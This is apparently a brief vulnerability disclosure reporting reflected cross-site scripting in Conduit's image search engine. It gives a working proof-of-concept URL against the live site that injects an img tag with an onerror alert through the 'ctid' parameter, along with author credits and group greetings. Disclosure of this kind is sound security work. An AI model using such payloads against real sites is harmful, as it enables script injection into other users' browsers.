Conduit Image Search Engine suffers from a cross site scripting vulnerability.
f52fbd36d3f1eec17af3fc52414ac907fd64fc4313d3337d13f93d1068f97e46
TITLE: Conduit Image Search Engine Cross site Scripting
vendor: Conduit
Author: r007k17-w
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork: © 2012 Conduit <http://www.conduit.com/>
-------------------------------------------------------------------------------------------------------------------------------------------
DEMO: http://images.search.conduit.com/search?q=dsfs&ctid="'><img src=vul
onerror=alert('r007k17-w')>&searchsource=32
---------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts,L0rd CrUs4d3r,3ps1lonl4mbd4,A1-w1n6( N17|<
),1nJ3ct0r t3am and all my friends
-----------------------------------------------------------------------------------------------------